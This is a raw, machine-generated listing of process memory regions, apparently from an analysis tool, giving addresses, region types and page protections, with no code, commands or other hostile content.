trusted library allocation
page read and write
7BDB000
heap
page read and write
C00000
remote allocation
page read and write
558000
heap
page read and write
97F9000
heap
page read and write
16ABBB6E000
heap
page read and write
7C2A000
heap
page read and write
48A6000
heap
page read and write
DB4D000
unkown
page read and write
223E9880000
heap
page read and write
223E7C2A000
heap
page read and write
3304000
heap
page read and write
2802000
heap
page read and write
4918000
heap
page read and write
6AC5000
heap
page read and write
3EB0000
trusted library section
page read and write
7FF514B81000
unkown
page readonly
9FF4000
unkown
page readonly
57E0000
unkown
page readonly
16AD3DF0000
trusted library allocation
page read and write
7DEC000
heap
page read and write
6B14000
heap
page read and write
C11B000
unkown
page readonly
181CD3E0000
trusted library allocation
page read and write
7FF514BC5000
unkown
page readonly
7F0000
trusted library allocation
page read and write
CD25000
unkown
page readonly
2871000
heap
page read and write
75F0000
unkown
page readonly
3420000
trusted library allocation
page read and write
7FF51491D000
unkown
page readonly
1DF00BF5000
trusted library allocation
page read and write
218C8313000
heap
page read and write
2AC0000
unkown
page readonly
72C8000
unkown
page readonly
42EE000
unkown
page read and write
68B78FE000
stack
page read and write
7FF5144C9000
unkown
page readonly
EAAB000
unkown
page read and write
6153000
unkown
page read and write
DF5307A000
stack
page read and write
1E9DCE50000
heap
page read and write
181CD4B0000
trusted library allocation
page read and write
7DF8000
heap
page read and write
181B4EB9000
trusted library allocation
page read and write
4BB0000
trusted library allocation
page read and write
2360000
unkown
page read and write
69B0000
trusted library allocation
page read and write
7FF514775000
unkown
page readonly
7DD4000
heap
page read and write
20F8C249000
heap
page read and write
6AA8000
heap
page read and write
6A9D000
heap
page read and write
DA6F000
stack
page read and write
7FFEBFD10000
trusted library allocation
page read and write
987E000
heap
page read and write
23A9CC7E000
heap
page read and write
7F7A000
unkown
page read and write
2890000
unkown
page readonly
7B91000
heap
page read and write
D10D000
stack
page read and write
7FF514A9D000
unkown
page readonly
9185000
unkown
page read and write
AEEA000
stack
page read and write
7D99000
heap
page read and write
7B62000
heap
page read and write
193F2A3C000
heap
page read and write
181CD470000
trusted library allocation
page read and write
7DF415AB1000
unkown
page execute read
287F000
heap
page read and write
20A41B0D000
heap
page read and write
20A41B0D000
heap
page read and write
1F19C2B0000
trusted library section
page readonly
DF1A000
heap
page read and write
7F87000
unkown
page read and write
7DF415AA0000
unkown
page readonly
41C1000
heap
page read and write
3D80000
trusted library allocation
page execute and read and write
47AE000
heap
page read and write
3304000
heap
page read and write
7B57000
heap
page read and write
E765000
unkown
page read and write
CC32000
unkown
page readonly
7089000
stack
page read and write
6ADC000
heap
page read and write
F8F9000
heap
page read and write
16AB9F30000
trusted library allocation
page read and write
7F87000
unkown
page read and write
7FFEBFCE0000
trusted library allocation
page read and write
7AE0000
heap
page read and write
156BEBE8000
heap
page read and write
7DCE000
heap
page read and write
82B9000
unkown
page read and write
41FA000
stack
page read and write
16ABD2E9000
trusted library allocation
page read and write
181B2C0A000
heap
page read and write
F678000
heap
page read and write
7488000
stack
page read and write
B3F0000
unkown
page read and write
7FFEBFCA0000
trusted library allocation
page read and write
6AF2000
heap
page read and write
4020000
trusted library section
page read and write
6A30000
heap
page read and write
7B52000
heap
page read and write
3304000
heap
page read and write
2A8B000
stack
page read and write
7DE0000
heap
page read and write
F8D9000
heap
page read and write
7FFEBFA9D000
trusted library allocation
page execute and read and write
7AE0000
heap
page read and write
2F13000
unclassified section
page execute and read and write
7FFF2E3AD000
unkown
page write copy
1DF00B9A000
trusted library allocation
page read and write
223E9936000
heap
page read and write
7FF514C09000
unkown
page readonly
7FF5147FD000
unkown
page readonly
7C32000
heap
page read and write
6B34000
heap
page read and write
70F3000
trusted library allocation
page read and write
57D0000
unkown
page readonly
4D26000
stack
page read and write
16ABBC24000
trusted library allocation
page read and write
558000
heap
page read and write
9F55000
unkown
page readonly
23A9CF10000
trusted library allocation
page read and write
181B2CC6000
heap
page read and write
1E9DDC02000
heap
page read and write
7DE0000
heap
page read and write
6A91000
heap
page read and write
7A90000
heap
page read and write
46E2000
unclassified section
page read and write
B3EF000
stack
page read and write
181CCFA0000
trusted library allocation
page read and write
7D07000
heap
page read and write
FAFC000
heap
page read and write
223E9896000
heap
page read and write
7FFEBFCA0000
trusted library allocation
page read and write
10A01000
heap
page read and write
FBB3000
heap
page read and write
680000
unkown
page readonly
6A80000
trusted library allocation
page read and write
CDDE000
unkown
page readonly
7E40000
heap
page read and write
7FF514BA7000
unkown
page readonly
5320000
unkown
page read and write
218C8A02000
trusted library allocation
page read and write
84EC000
stack
page read and write
EFFE000
unkown
page read and write
3C80000
trusted library allocation
page read and write
56B000
heap
page read and write
808D000
stack
page read and write
7D69000
stack
page read and write
48F6000
heap
page read and write
7FFF295ED000
unkown
page write copy
550000
heap
page read and write
7AD2000
heap
page read and write
8C0D000
unkown
page read and write
7A94000
heap
page read and write
7FFEBFE00000
trusted library allocation
page read and write
24CE000
stack
page read and write
16AD3CD0000
trusted library allocation
page read and write
7CC4000
heap
page read and write
928E000
unkown
page read and write
2B07000
stack
page read and write
181CD430000
trusted library allocation
page read and write
193F2A7F000
heap
page read and write
821A000
unkown
page read and write
7FF5146E4000
unkown
page readonly
181CCBA1000
heap
page read and write
1F19BA00000
heap
page read and write
181CCFD0000
trusted library allocation
page read and write
2836000
unkown
page read and write
7D17000
heap
page read and write
CF8B000
stack
page read and write
6ADF000
heap
page read and write
71C5000
trusted library allocation
page read and write
7D99000
heap
page read and write
2836000
unkown
page read and write
7FF514650000
unkown
page readonly
7FF514B7A000
unkown
page readonly
78D000
stack
page read and write
6150000
unkown
page read and write
D969000
stack
page read and write
48A6000
heap
page read and write
8206000
unkown
page read and write
AB35ABF000
stack
page read and write
7DEA000
heap
page read and write
F8CE000
heap
page read and write
847000
heap
page read and write
D36000
system
page execute and read and write
7B1B000
heap
page read and write
F8ED000
heap
page read and write
7B52000
heap
page read and write
7FF51482C000
unkown
page readonly
193F2A00000
heap
page read and write
1166D000
stack
page read and write
6ADF000
heap
page read and write
7FFEBFCB0000
trusted library allocation
page read and write
83E9000
stack
page read and write
4100000
unkown
page read and write
F8F5000
heap
page read and write
7FF5146B0000
unkown
page readonly
D3EE000
stack
page read and write
45DD000
stack
page read and write
D8C6AFE000
stack
page read and write
81A3000
unkown
page read and write
F87A000
heap
page read and write
7FFEBFA94000
trusted library allocation
page read and write
4270000
trusted library section
page read and write
156BEBF0000
heap
page read and write
68B787E000
stack
page read and write
CEA5000
unkown
page readonly
7B44000
heap
page read and write
23A85043000
trusted library allocation
page read and write
856000
heap
page read and write
7FF5144D2000
unkown
page readonly
27A8000
unkown
page read and write
E755000
unkown
page read and write
3FF0000
unkown
page readonly
770000
heap
page read and write
8D8D000
unkown
page read and write
1DF78FC4000
heap
page read and write
C5F7000
unkown
page readonly
47B3000
heap
page read and write
7CBD000
heap
page read and write
6AD5000
heap
page read and write
1D785716000
trusted library allocation
page read and write
2B7B000
heap
page read and write
7C1B000
heap
page read and write
796C000
stack
page read and write
10C39000
heap
page read and write
558000
heap
page read and write
4918000
heap
page read and write
16AD3E00000
trusted library allocation
page read and write
2ED0000
heap
page read and write
27FE000
stack
page read and write
7B57000
heap
page read and write
9D0000
heap
page read and write
D3EE000
stack
page read and write
193F2B02000
heap
page read and write
7DF6000
heap
page read and write
7FFEBFDE0000
trusted library allocation
page read and write
798F000
stack
page read and write
181CCFE0000
trusted library allocation
page read and write
7FFEBFCF0000
trusted library allocation
page read and write
181CD400000
trusted library allocation
page read and write
7FF514ABA000
unkown
page readonly
9F4E000
unkown
page readonly
9813000
heap
page read and write
F6FB000
heap
page read and write
7D99000
heap
page read and write
D1FB000
unkown
page read and write
BB1000
trusted library allocation
page read and write
20A418DD000
heap
page read and write
F677000
heap
page read and write
1F19C280000
trusted library section
page readonly
7FF5148F8000
unkown
page readonly
8168000
unkown
page read and write
24204C71000
heap
page read and write
7BDB000
heap
page read and write
857000
heap
page read and write
16ABBBA9000
heap
page read and write
3304000
heap
page read and write
7E1F000
heap
page read and write
82C7000
unkown
page read and write
1C80DC4A000
heap
page read and write
C6B0000
unkown
page readonly
2FA000
unkown
page read and write
16ABBBA9000
heap
page read and write
7FFEBFCB0000
trusted library allocation
page read and write
7FF5146B0000
unkown
page readonly
AB35475000
stack
page read and write
7FF5146BE000
unkown
page readonly
7B1B000
heap
page read and write
F6FB000
heap
page read and write
7BD3000
heap
page read and write
7DFA000
heap
page read and write
16AB9BA0000
heap
page read and write
990000
unkown
page readonly
70A3000
trusted library allocation
page read and write
7FF514413000
unkown
page readonly
4449000
heap
page read and write
78ED000
stack
page read and write
A289000
unkown
page readonly
7B57000
heap
page read and write
22E1B439000
heap
page read and write
23A82DB6000
heap
page read and write
7FFEBFC41000
trusted library allocation
page read and write
7B52000
heap
page read and write
72A1000
unkown
page readonly
AEEA000
stack
page read and write
95163F8000
stack
page read and write
181B5EB9000
trusted library allocation
page read and write
7E12000
heap
page read and write
2BC0000
unkown
page readonly
D6ED000
stack
page read and write
2D48000
stack
page read and write
201E000
stack
page read and write
75A5000
unkown
page readonly
41A8000
heap
page read and write
7DC1000
heap
page read and write
284A000
stack
page read and write
7FF514BE7000
unkown
page readonly
7FFEBFBA0000
trusted library allocation
page execute and read and write
7CF5000
heap
page read and write
C6C2000
unkown
page readonly
6A30000
trusted library allocation
page read and write
7CCD000
heap
page read and write
7DC4000
heap
page read and write
F37E000
unkown
page read and write
D33000
system
page execute and read and write
6CB0000
trusted library allocation
page read and write
7CEA000
heap
page read and write
6AD5000
heap
page read and write
181CD43C000
trusted library allocation
page read and write
7F84000
unkown
page read and write
76A3000
unkown
page read and write
1F1A0A4A000
heap
page read and write
11AED000
stack
page read and write
7A96000
heap
page read and write
7B52000
heap
page read and write
7B62000
heap
page read and write
7FF5147A0000
unkown
page readonly
7FFEBFDD0000
trusted library allocation
page read and write
7FF514B55000
unkown
page readonly
2776000
unkown
page read and write
E060000
unkown
page read and write
23A85032000
trusted library allocation
page read and write
D46B000
stack
page read and write
22E1B437000
heap
page read and write
84A000
heap
page read and write
7384000
unkown
page readonly
9A0000
unkown
page readonly
F50F000
stack
page read and write
7FFF2E2BA000
unkown
page read and write
7B91000
heap
page read and write
7FF514865000
unkown
page readonly
DB20000
unkown
page read and write
4478000
heap
page read and write
3EE0000
unkown
page read and write
431F000
unkown
page read and write
28F0000
trusted library allocation
page execute and read and write
181CCBA1000
heap
page read and write
97AD000
heap
page read and write
193F2B08000
heap
page read and write
7FFF2E3AA000
unkown
page read and write
282D000
heap
page read and write
7C2A000
heap
page read and write
6730000
trusted library allocation
page read and write
223E98B9000
heap
page read and write
7FF5147FD000
unkown
page readonly
FBA9000
heap
page read and write
1F1A0AFF000
heap
page read and write
A25000
heap
page read and write
223E9970000
heap
page read and write
7D36000
heap
page read and write
7FFEBFCF0000
trusted library allocation
page read and write
7DF446121000
trusted library allocation
page execute read
A1C3000
unkown
page readonly
4000000
unkown
page read and write
D00E000
stack
page read and write
80FC000
unkown
page read and write
D8C6DF7000
stack
page read and write
7FFEBFC34000
trusted library allocation
page read and write
53A9000
stack
page read and write
7A8E000
stack
page read and write
181CCB33000
heap
page read and write
22E1B360000
trusted library allocation
page read and write
2E60000
unclassified section
page execute and read and write
F6E7000
heap
page read and write
24204C8A000
heap
page read and write
30E71FF000
stack
page read and write
1DF78FC2000
heap
page read and write
7B16000
heap
page read and write
F90F000
heap
page read and write
7B16000
heap
page read and write
7B4B000
heap
page read and write
181B4A11000
trusted library allocation
page read and write
1DF7AF08000
heap
page read and write
7FF514915000
unkown
page readonly
2809000
unkown
page read and write
70A5000
trusted library allocation
page read and write
8FED000
stack
page read and write
1165000
heap
page read and write
F8E9000
heap
page read and write
A20000
heap
page read and write
CB7E000
unkown
page read and write
41B6000
heap
page read and write
CC32000
unkown
page readonly
D30C000
stack
page read and write
7C31000
heap
page read and write
7DF446130000
trusted library allocation
page readonly
1FD1B000000
trusted library allocation
page read and write
7B91000
heap
page read and write
5341000
unkown
page read and write
1FD2B571000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
7AC3000
heap
page read and write
94EB000
stack
page read and write
6C0000
unkown
page readonly
7FF514A60000
unkown
page readonly
181CCC60000
trusted library allocation
page read and write
7FFEBFAA0000
trusted library allocation
page read and write
7FFEBFC35000
trusted library allocation
page read and write
7FFEBFD80000
trusted library allocation
page read and write
2B4C000
heap
page read and write
1E9DD78F000
heap
page read and write
4347000
unkown
page read and write
48B6000
unkown
page read and write
20A41965000
heap
page read and write
4340000
system
page execute and read and write
F57C000
heap
page read and write
7FF5146A4000
unkown
page readonly
CB1000
heap
page read and write
F673000
heap
page read and write
D2A0000
heap
page read and write
CF7C000
unkown
page read and write
60FD000
stack
page read and write
22E1B523000
heap
page read and write
84A000
heap
page read and write
7FF5146AC000
unkown
page readonly
7CF2000
heap
page read and write
7DF415AB1000
unkown
page execute read
43F4000
heap
page read and write
7FF514AD4000
unkown
page readonly
9BEE000
stack
page read and write
16AB9AD0000
heap
page read and write
763BF3B000
stack
page read and write
7FF514BB9000
unkown
page readonly
7FF5148EB000
unkown
page readonly
FB3F000
heap
page read and write
7FF51443D000
unkown
page readonly
7FFEBFD27000
trusted library allocation
page read and write
7BDB000
heap
page read and write
10B95000
heap
page read and write
7868000
stack
page read and write
2760000
heap
page read and write
7C23000
heap
page read and write
181CD4D0000
trusted library allocation
page read and write
30000
unkown
page read and write
223EB6F0000
trusted library allocation
page read and write
7DEC000
heap
page read and write
7E08000
heap
page read and write
7FF514BA7000
unkown
page readonly
E7000
stack
page read and write
3EC0000
trusted library section
page read and write
10B9B000
heap
page read and write
62F3000
unkown
page read and write
25E9000
stack
page read and write
8277000
unkown
page read and write
1DF79070000
heap
page read and write
7FFEBFD00000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
1F1A0770000
trusted library allocation
page read and write
7B4F000
heap
page read and write
7F8F000
unkown
page read and write
181B4520000
trusted library allocation
page read and write
7B30000
heap
page read and write
BDEB000
stack
page read and write
223E9895000
heap
page read and write
4120000
heap
page read and write
7DEA000
heap
page read and write
745C000
unkown
page readonly
7CBD000
heap
page read and write
52771A000
stack
page read and write
75A5000
unkown
page readonly
4830000
heap
page read and write
181B4500000
heap
page read and write
3ED0000
unkown
page read and write
C8F9000
unkown
page readonly
426F000
heap
page read and write
7DD4000
heap
page read and write
7FF514A7A000
unkown
page readonly
7FF514B25000
unkown
page readonly
7B63000
heap
page read and write
7C27000
heap
page read and write
223E9A7D000
heap
page read and write
7F7000
heap
page read and write
7FFEBFDB0000
trusted library allocation
page read and write
30E72F7000
stack
page read and write
2909000
stack
page read and write
1FD337B5000
heap
page read and write
7AC5000
heap
page read and write
7CC2000
heap
page read and write
2F5000
stack
page read and write
181CD060000
heap
page read and write
A53B000
stack
page read and write
8A8D000
unkown
page read and write
7C0D000
heap
page read and write
770000
heap
page read and write
9D5000
heap
page read and write
9797000
unkown
page read and write
1E9DD78E000
heap
page read and write
3ED0000
unkown
page read and write
7DF4460D0000
trusted library allocation
page readonly
1C80DAC1000
heap
page read and write
AB35A3E000
stack
page read and write
1DF78E60000
unkown
page read and write
7B0D000
heap
page read and write
6A2C000
stack
page read and write
F706000
heap
page read and write
66C0000
trusted library allocation
page read and write
2BB9000
stack
page read and write
7E77000
heap
page read and write
7FF51476F000
unkown
page readonly
7FF51465D000
unkown
page readonly
24204C13000
heap
page read and write
D9EE000
stack
page read and write
7B1B000
heap
page read and write
82C7000
unkown
page read and write
1095A000
heap
page read and write
295B000
stack
page read and write
66A8000
stack
page read and write
C00000
remote allocation
page read and write
4D30000
unkown
page readonly
181B5A0F000
trusted library allocation
page read and write
D46E000
stack
page read and write
95EF000
stack
page read and write
2AC0000
unkown
page readonly
1E9DDC00000
heap
page read and write
778000
heap
page read and write
FCF4000
heap
page read and write
30E717B000
stack
page read and write
181CCFC1000
trusted library allocation
page read and write
7D4D000
heap
page read and write
181CD520000
trusted library allocation
page read and write
7FF514A4A000
unkown
page readonly
72E000
heap
page read and write
A4BB000
stack
page read and write
7E00000
heap
page read and write
7FF514A04000
unkown
page readonly
25DF000
stack
page read and write
181B5EDC000
trusted library allocation
page read and write
7FF514A26000
unkown
page readonly
527EFF000
stack
page read and write
7FF514969000
unkown
page readonly
7FFF2964F000
unkown
page readonly
7FFEBFE00000
trusted library allocation
page read and write
CAFB000
unkown
page read and write
2BC0000
unkown
page readonly
23A82D9B000
heap
page read and write
23A84A91000
trusted library allocation
page read and write
7FF514CA3000
unkown
page readonly
2D5000
stack
page read and write
6DF0000
unkown
page readonly
863000
heap
page read and write
730D000
stack
page read and write
8F8F000
unkown
page read and write
7FFF2E3CA000
unkown
page readonly
1E9DDBA0000
remote allocation
page read and write
1D78568D000
heap
page read and write
28CC000
stack
page read and write
6AD7000
heap
page read and write
223EB5D0000
heap
page read and write
3DD000
stack
page read and write
7C11000
heap
page read and write
7B63000
heap
page read and write
71E3000
trusted library allocation
page read and write
108CE000
heap
page read and write
7FFEBFD10000
trusted library allocation
page read and write
181CCDB6000
heap
page read and write
7DF446131000
trusted library allocation
page execute read
7FFEBFDB0000
trusted library allocation
page read and write
1DF7AC50000
trusted library allocation
page read and write
7FFEBFB40000
trusted library allocation
page read and write
5371000
unkown
page read and write
1DF78E40000
unkown
page readonly
8168000
unkown
page read and write
48A9000
heap
page read and write
4871000
unkown
page read and write
68B767F000
stack
page read and write
16AB9C20000
heap
page read and write
482E000
heap
page read and write
52E0000
unkown
page read and write
223E7C33000
heap
page read and write
8F0C000
unkown
page read and write
7FF514A7F000
unkown
page readonly
D36000
system
page readonly
D10D000
stack
page read and write
7EE6000
stack
page read and write
7E40000
heap
page read and write
7FFEBFC72000
trusted library allocation
page read and write
F907000
heap
page read and write
4772000
heap
page read and write
76EA000
unkown
page read and write
10B91000
heap
page read and write
7C23000
heap
page read and write
7FF51464B000
unkown
page readonly
6AE0000
heap
page read and write
16ABBAA7000
heap
page execute and read and write
1FD1C1E6000
trusted library allocation
page read and write
7B1B000
heap
page read and write
2990000
unkown
page readonly
7FFF295EE000
unkown
page read and write
482D000
heap
page read and write
7FF514A4A000
unkown
page readonly
7CEC000
stack
page read and write
16ABBB17000
heap
page read and write
1C80DB31000
heap
page read and write
1F1A0AF8000
heap
page read and write
8F6D000
stack
page read and write
1DF79075000
heap
page read and write
5E37BF9000
stack
page read and write
4778000
heap
page read and write
7FF514B35000
unkown
page readonly
7AA4000
heap
page read and write
418F000
heap
page read and write
7FF4F5B30000
unkown
page readonly
629C000
stack
page read and write
2373000
heap
page read and write
7FF514C87000
unkown
page readonly
16AB9B20000
unkown
page readonly
6A9E000
heap
page read and write
2853000
heap
page read and write
E770000
unkown
page read and write
3304000
heap
page read and write
46C0000
unkown
page read and write
770000
heap
page read and write
7C0D000
heap
page read and write
7B0E000
heap
page read and write
2C68000
stack
page read and write
16ABBBF3000
heap
page read and write
44DB000
heap
page read and write
7FF5146F1000
unkown
page readonly
4100000
unkown
page read and write
FCE4000
heap
page read and write
680000
unkown
page readonly
F080000
unkown
page read and write
7FF514AA6000
unkown
page readonly
7D0A000
heap
page read and write
820C000
stack
page read and write
223E7B75000
heap
page read and write
25E9000
stack
page read and write
D80000
heap
page read and write
763BDBF000
stack
page read and write
9308000
unkown
page read and write
BA0000
trusted library allocation
page read and write
7FF51465A000
unkown
page readonly
488F000
heap
page read and write
16ABD0CF000
trusted library allocation
page read and write
7FFEBFA90000
trusted library allocation
page read and write
6AA8000
heap
page read and write
181B4F1D000
trusted library allocation
page read and write
ECFB000
unkown
page read and write
27C6000
heap
page read and write
2B5B000
heap
page read and write
6CA0000
trusted library allocation
page read and write
181CD49F000
trusted library allocation
page read and write
7C0D000
heap
page read and write
7FF5148EF000
unkown
page readonly
7B5B000
heap
page read and write
1D785689000
heap
page read and write
7E52000
heap
page read and write
7D5F000
heap
page read and write
8233000
unkown
page read and write
23A9CC7E000
heap
page read and write
AB3577F000
stack
page read and write
57B0000
unkown
page readonly
E092000
unkown
page read and write
550000
heap
page read and write
480C000
unkown
page read and write
7FF514B28000
unkown
page readonly
48F6000
heap
page read and write
6AE0000
heap
page read and write
223E9967000
heap
page read and write
7FFEBFD20000
trusted library allocation
page read and write
4393000
unkown
page read and write
A1AE000
unkown
page readonly
97B8000
heap
page read and write
520000
heap
page read and write
193F2A70000
heap
page read and write
16AD3CB0000
heap
page execute and read and write
EA63000
unkown
page read and write
7D30000
heap
page read and write
1F19B088000
heap
page read and write
7FF514687000
unkown
page readonly
2802000
heap
page read and write
2AD0000
heap
page read and write
2B10000
unkown
page readonly
690000
unkown
page read and write
2AB5000
stack
page read and write
7FFEBFD20000
trusted library allocation
page read and write
57B0000
unkown
page readonly
7A92000
heap
page read and write
97C2000
heap
page read and write
7CF5000
heap
page read and write
9851000
heap
page read and write
7F7000
heap
page read and write
2276000
stack
page read and write
20F8C150000
heap
page read and write
181CCE12000
heap
page read and write
7D72000
heap
page read and write
193F2B00000
heap
page read and write
2B75000
heap
page read and write
1FD1C1EB000
trusted library allocation
page read and write
7FF514B55000
unkown
page readonly
E757000
unkown
page read and write
6A35000
trusted library allocation
page read and write
520000
heap
page read and write
7FF514413000
unkown
page readonly
1FD33618000
heap
page read and write
181CD3E0000
trusted library allocation
page read and write
7485000
unkown
page readonly
20F8C281000
heap
page read and write
426F000
heap
page read and write
F510000
heap
page read and write
7FFF2E3CA000
unkown
page readonly
7CEA000
heap
page read and write
7B1B000
heap
page read and write
7B0D000
heap
page read and write
6715000
trusted library allocation
page read and write
7D67000
heap
page read and write
978D000
unkown
page read and write
7FF514A57000
unkown
page readonly
7B16000
heap
page read and write
1F19B013000
heap
page read and write
D34F87B000
stack
page read and write
7FF5146EB000
unkown
page readonly
7DD1000
heap
page read and write
6D03000
trusted library allocation
page read and write
1F19C2A0000
trusted library section
page readonly
F5BA000
heap
page read and write
7FF5144E3000
unkown
page readonly
7AE7000
heap
page read and write
1F1A08C0000
trusted library allocation
page read and write
720000
heap
page read and write
181CD400000
trusted library allocation
page read and write
C6C0000
unkown
page readonly
1FD33770000
heap
page read and write
7FFF295F0000
unkown
page read and write
970000
unkown
page readonly
CD4E000
unkown
page readonly
4DA8000
unkown
page read and write
700000
unkown
page read and write
10B95000
heap
page read and write
7B16000
heap
page read and write
7FF514A9D000
unkown
page readonly
642E000
stack
page read and write
3001000
trusted library allocation
page read and write
7C13000
heap
page read and write
84442FD000
stack
page read and write
72C8000
unkown
page readonly
CCFA000
unkown
page read and write
75F7000
unkown
page readonly
770000
heap
page read and write
1E9DD77E000
heap
page read and write
449C000
stack
page read and write
1FD337B1000
heap
page read and write
EDEB000
stack
page read and write
30000
heap
page read and write
9185000
unkown
page read and write
7FF514913000
unkown
page readonly
7FF514CAB000
unkown
page readonly
27AB000
heap
page read and write
7DE0000
heap
page read and write
22E1B360000
trusted library allocation
page read and write
951627E000
stack
page read and write
7FFF2E3AA000
unkown
page read and write
44D6000
heap
page read and write
7D60000
heap
page read and write
C5A1000
unkown
page readonly
181CD3E0000
trusted library allocation
page read and write
AEEA000
stack
page read and write
7FF5149EF000
unkown
page readonly
7FF514ADB000
unkown
page readonly
6EF0000
trusted library allocation
page read and write
7D4D000
heap
page read and write
223E7B77000
heap
page read and write
7A94000
heap
page read and write
7690000
unkown
page read and write
7619000
unkown
page readonly
2A0B000
trusted library allocation
page execute and read and write
1DF7B170000
heap
page read and write
DF52F7E000
stack
page read and write
F5BA000
heap
page read and write
76FF000
unkown
page read and write
7FF5149D4000
unkown
page readonly
223E98F1000
heap
page read and write
7CF7000
heap
page read and write
1E9DCEC9000
heap
page read and write
CB41000
unkown
page readonly
8B89000
unkown
page read and write
3470000
heap
page read and write
7C32000
heap
page read and write
E757000
unkown
page read and write
3300000
heap
page read and write
181B2D15000
heap
page read and write
FC41000
heap
page read and write
181CCDC8000
heap
page read and write
268F000
stack
page read and write
7FFEBFD10000
trusted library allocation
page read and write
1C80BBD0000
heap
page read and write
D00E000
stack
page read and write
7DFC000
heap
page read and write
3304000
heap
page read and write
7B6A000
heap
page read and write
C6A0000
unkown
page readonly
181CD3E0000
trusted library allocation
page read and write
CB41000
unkown
page readonly
7B52000
heap
page read and write
22E1B44B000
heap
page read and write
25B1000
heap
page read and write
1F19C270000
trusted library section
page readonly
480000
heap
page read and write
7FFEBFB3C000
trusted library allocation
page execute and read and write
6AF2000
heap
page read and write
1FD1AF50000
trusted library allocation
page read and write
68B777E000
stack
page read and write
3B51000
heap
page read and write
7FF514909000
unkown
page readonly
7FF514C29000
unkown
page readonly
2873000
heap
page read and write
181CCFD0000
trusted library allocation
page read and write
277A000
unkown
page read and write
1F1A07A0000
trusted library allocation
page read and write
CEFC000
unkown
page read and write
7FF514AE2000
unkown
page readonly
8443EFF000
stack
page read and write
64AD000
stack
page read and write
7D07000
heap
page read and write
7D99000
heap
page read and write
F8D2000
heap
page read and write
1E9DCE87000
heap
page read and write
7FF514BB4000
unkown
page readonly
1E9DDC02000
heap
page read and write
7D36000
heap
page read and write
D28E000
stack
page read and write
7CDA000
heap
page read and write
7DCE000
heap
page read and write
CE90000
unkown
page readonly
181B4570000
heap
page read and write
29D0000
trusted library allocation
page read and write
9368000
stack
page read and write
4AA7000
stack
page read and write
9FAB000
stack
page read and write
4DB0000
unkown
page read and write
482E000
heap
page read and write
16ABB710000
heap
page execute and read and write
5300000
unkown
page read and write
181CD510000
trusted library allocation
page read and write
7DF415AA1000
unkown
page execute read
6B14000
heap
page read and write
7FFEBFC90000
trusted library allocation
page read and write
30000
unkown
page read and write
7BDE000
heap
page read and write
3304000
heap
page read and write
7D62000
heap
page read and write
7FF51467D000
unkown
page readonly
7FFF295ED000
unkown
page write copy
48A9000
heap
page read and write
F73F000
heap
page read and write
3EE3000
unkown
page read and write
CDB5000
unkown
page readonly
27F7000
unkown
page read and write
D60000
heap
page read and write
1DF7ADF0000
heap
page execute and read and write
7D99000
heap
page read and write
7708000
stack
page read and write
7FF514B00000
unkown
page readonly
48F6000
heap
page read and write
7FFEBFC60000
trusted library allocation
page execute and read and write
8277000
unkown
page read and write
7F70000
unkown
page read and write
6720000
trusted library allocation
page read and write
7FFEBFB60000
trusted library allocation
page execute and read and write
4020000
trusted library section
page read and write
1FD1B085000
heap
page read and write
1F1A0ADF000
heap
page read and write
7FFEBFAB3000
trusted library allocation
page read and write
4720000
heap
page read and write
E9E4000
unkown
page read and write
7B11000
heap
page read and write
DF52E7F000
stack
page read and write
5300000
unkown
page read and write
D37000
system
page execute and read and write
7CEE000
heap
page read and write
480000
heap
page read and write
6EC3000
trusted library allocation
page read and write
7DEA000
heap
page read and write
4798000
heap
page read and write
ADEF000
stack
page read and write
43B0000
trusted library allocation
page read and write
5EB000
heap
page read and write
1E9DD79A000
heap
page read and write
7DF446140000
trusted library allocation
page readonly
7DCA000
heap
page read and write
1DF7AF08000
heap
page read and write
6C90000
heap
page readonly
D4EB000
stack
page read and write
7B4F000
heap
page read and write
7FFF2E3B3000
unkown
page readonly
1F19B03D000
heap
page read and write
7687000
unkown
page read and write
7FFEBFD60000
trusted library allocation
page read and write
4AA7000
stack
page read and write
7FF514923000
unkown
page readonly
1D24BFE000
stack
page read and write
2276000
stack
page read and write
1E9DCE4D000
heap
page read and write
52F0000
unkown
page read and write
7FF4F5B34000
unkown
page readonly
3C80000
trusted library allocation
page read and write
7B6A000
heap
page read and write
181CCFA0000
trusted library allocation
page read and write
7C23000
heap
page read and write
7FF514BDF000
unkown
page readonly
73F0000
trusted library allocation
page read and write
482E000
heap
page read and write
2ACE000
stack
page read and write
F7CC000
heap
page read and write
4420000
trusted library allocation
page read and write
7FF514687000
unkown
page readonly
7A9B000
heap
page read and write
223E7B69000
heap
page read and write
F625000
heap
page read and write
6AA0000
heap
page read and write
A24C000
unkown
page readonly
7FFEBFA94000
trusted library allocation
page read and write
1D24FB9000
stack
page read and write
4160000
unkown
page read and write
7CD7000
heap
page read and write
750000
unkown
page read and write
181CCB9C000
heap
page read and write
4B2B000
stack
page read and write
7A57000
heap
page read and write
2880000
trusted library allocation
page read and write
24CE000
stack
page read and write
F706000
heap
page read and write
20A3F850000
heap
page read and write
A0CC000
unkown
page readonly
E759000
unkown
page read and write
F886000
heap
page read and write
1DF014B7000
trusted library allocation
page read and write
23A84676000
heap
page read and write
48D6000
heap
page read and write
F584000
heap
page read and write
97BC000
heap
page read and write
7DD9000
heap
page read and write
1FD1B000000
trusted library allocation
page read and write
7DF446151000
trusted library allocation
page execute read
7B4B000
heap
page read and write
7FF5144E3000
unkown
page readonly
4918000
heap
page read and write
2608000
stack
page read and write
1E9DCEE3000
heap
page read and write
7FF514BC5000
unkown
page readonly
6AF2000
heap
page read and write
240000
heap
page read and write
181B57B1000
trusted library allocation
page read and write
8EF000
heap
page read and write
4CAE000
stack
page read and write
1FD1B571000
trusted library allocation
page read and write
7690000
unkown
page read and write
293E000
stack
page read and write
4734000
heap
page read and write
7E45000
heap
page read and write
7C27000
heap
page read and write
5800000
trusted library allocation
page read and write
7FF5146E4000
unkown
page readonly
1E9DD71A000
heap
page read and write
7FF514AA6000
unkown
page readonly
825000
heap
page read and write
8220000
unkown
page read and write
62FE000
stack
page read and write
1D78571A000
trusted library allocation
page read and write
6730000
trusted library allocation
page read and write
7D15000
heap
page read and write
E740000
unkown
page read and write
23A82C90000
heap
page read and write
1E9DD777000
heap
page read and write
6B14000
heap
page read and write
7008000
stack
page read and write
800000
heap
page read and write
2B75000
heap
page read and write
29C0000
trusted library allocation
page read and write
C6C2000
unkown
page readonly
F27B000
unkown
page read and write
20F8C276000
heap
page read and write
520000
heap
page read and write
E7F9000
unkown
page read and write
476000
stack
page read and write
7DE8000
heap
page read and write
1DF7AFA5000
heap
page read and write
7DD7000
heap
page read and write
F883000
heap
page read and write
78ED000
stack
